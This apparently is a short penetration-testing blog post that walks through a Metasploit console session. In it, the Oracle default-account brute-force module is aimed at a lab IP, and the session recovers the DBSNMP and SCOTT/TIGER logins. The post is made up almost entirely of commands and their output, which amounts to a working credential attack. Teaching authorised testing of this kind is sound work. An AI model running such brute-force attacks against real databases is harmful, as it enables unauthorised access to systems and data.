Oracle Pwnage with the Metasploit Oracle Modules Part 4
Posted by CG
Thank MC for this one...
http://metasploit.com/users/mc/oracle9i/brute_login.rb
msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST 172.16.102.130
RHOST => 172.16.102.130
msf auxiliary(brute_login) > info
Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$
Provided by:
MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.102.130 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
Description:
This module uses a list of well known authentication credentials for bruteforcing the TNS service.
msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run
[*] Found user/pass of: DBSNMP/DBSNMP...
[*] Found user/pass of: SCOTT/TIGER...
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >
